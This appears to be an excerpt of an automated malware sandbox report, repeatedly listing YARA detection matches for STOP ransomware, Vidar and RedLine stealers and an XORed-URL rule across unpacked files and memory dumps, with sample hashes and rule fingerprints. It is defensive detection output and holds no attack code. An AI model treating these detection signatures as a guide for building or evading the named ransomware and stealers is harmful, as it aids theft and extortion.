Source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.2OmglUwx83.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000000.409643469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.381718272.0000000002011000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000000.422829204.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.350781670.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.420520373.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.391097079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.378489771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000000.410137244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000000.00000002.354896040.0000000000674000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.393257427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.419588694.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.398626476.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.352491772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000000.426354404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.399360568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.388953002.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
